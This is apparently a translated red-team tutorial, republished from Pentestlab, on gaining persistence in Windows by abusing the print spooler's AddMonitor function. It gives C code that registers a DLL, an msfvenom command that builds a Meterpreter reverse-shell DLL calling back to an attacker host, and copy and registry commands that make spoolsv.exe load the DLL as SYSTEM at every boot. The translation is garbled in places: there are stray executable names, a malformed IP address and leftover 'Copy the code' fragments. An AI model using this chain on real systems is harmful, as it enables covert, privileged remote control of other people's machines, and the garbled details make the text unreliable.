The spooler service manages print jobs in the Windows operating system. The interaction with the service is performed through the print spooler API, which contains a function (AddMonitor) that can be used to install the local port monitor and connect configuration, data, and monitor files. This function can inject DLLS into the spoolSV.exe process, and red Team Operator can implement persistence on the system by creating registry keys. Brady Bloxham demonstrated this persistence technique at Defcon 22. It should be noted that this technique requires administration-level privileges and that DLLS must be dragged and dropped onto disk. Mantvydas Baranauskas uses the following code on his website as part of his Red Team notes. The Windows.h header includes winspool.h, which is required by the Microsoft specification. This MONITOR_INFO_2 is used to specify the necessary monitoring details:
- PName // Monitor name
- PEnvironment // Environment architecture
- PDLLName // The name of the monitor DLL file
#include "Windows.h"
int main() {
MONITOR_INFO_2 monitorInfo;
TCHAR env[12] = TEXT("Windows x64");
TCHAR name[12] = TEXT("Monitor");
TCHAR dll[12] = TEXT("test.dll");
monitorInfo.pName = name;
monitorInfo.pEnvironment = env;
monitorInfo.pDLLName = dll;
AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
return 0;
}
Copy the code
AddMonitor function
Compiling the code generates an executable file (in this case, application.exe) that performs the registration of a malicious DLL (test.dll) on the system. The Metasploit framework can be used to generate DLLS that will serve the Meterpreter payload.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.02.21. LPORT=4444 -f dll > test.dll
Copy the codeThe DLL must be copied to the System32 folder because, according to Microsoft documentation, this is the expected location of the AddMonitor function in order to load the associated DLL.
copy C:\Users\pentestlab\Desktop\test.dll C:\Windows\System32
Monitors.exe
Copy the code
Copy the malicious DLL to System32
Surveills.exe must be in the same folder (System32) as the malicious DLL. Executing this file establishes communication with Meterpreter.
Meterpreter – AddMonitor registers DLLS
However, for persistence, a key is required under the Monitors registry location.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors
Copy the codeThe following command will create a registry key that will contain the value test.dll. Viewing the registry from the editor verifies that the key has been created.
reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ
Copy the code
Port Monitor – Registry key
On the next reboot, the Spoolsv.exe process loads all driver DLLS that exist in the Monitors registry key and are stored in the Windows folder System32. The following figure illustrates that the Meterpreter session has been established with the same level of privileges as the Print Spooler service (SYSTEM) and has been executed from the System32 folder (the folder where test.dll was deleted).
Persistent port Monitor – Meterpreter
This article is compiled and translated by Bypass for security research and learning purposes only.
Original address:Pentestlab. Blog / 2019/10/28 /…
